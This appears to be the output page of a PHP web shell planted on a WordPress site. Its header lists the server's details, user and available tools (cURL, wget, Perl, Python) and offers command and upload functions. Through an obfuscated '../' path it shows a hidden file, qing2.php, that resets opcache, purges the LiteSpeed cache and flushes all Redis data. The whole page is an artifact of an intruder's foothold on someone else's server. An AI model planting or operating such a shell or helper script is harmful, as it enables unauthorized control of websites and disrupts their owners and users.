Server IP : 10.123.20.5  /  Your IP : 216.73.216.89
Web Server : Apache
System : Linux webm005.cluster123.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : wqgepnx ( 163969)
PHP Version : 8.2.31
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/wqgepnx/www/wp-includes/blocks/missing/../table/../../css/../html-api/../css/../../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/wqgepnx/www/wp-includes/blocks/missing/../table/../../css/../html-api/../css/../../qing2.php
<?php 

if(function_exists("opcache_reset")){
	opcache_reset();
	echo "opcache_reset ok<br>\n";
}

header("X-LiteSpeed-Purge: *");


if (extension_loaded('redis')) {
   $redis = new Redis();
	$redis->connect('127.0.0.1', 6379);
	 
	$redis->flushAll();
	echo "Redis ok<br>\n";
}



?>